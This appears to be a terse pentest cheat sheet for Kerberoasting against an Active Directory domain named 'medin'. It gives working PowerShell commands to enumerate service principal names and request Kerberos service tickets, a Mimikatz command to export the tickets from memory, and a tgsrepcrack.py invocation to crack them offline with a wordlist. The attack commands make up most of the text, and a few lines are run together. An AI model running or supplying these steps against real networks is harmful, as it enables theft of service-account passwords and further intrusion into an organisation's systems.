kerberoast
Extract all accounts in use as SPN using built in MS tools
PS C:\> setspn -T medin -Q */*Request Ticket(s)
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local" PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } Extract the acquired tickets from ram with Mimikatz
mimikatz # kerberos::list /exportCrack with tgsrepcrack
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbiRewrite
Inject back into RAM with Mimikatz
Last updated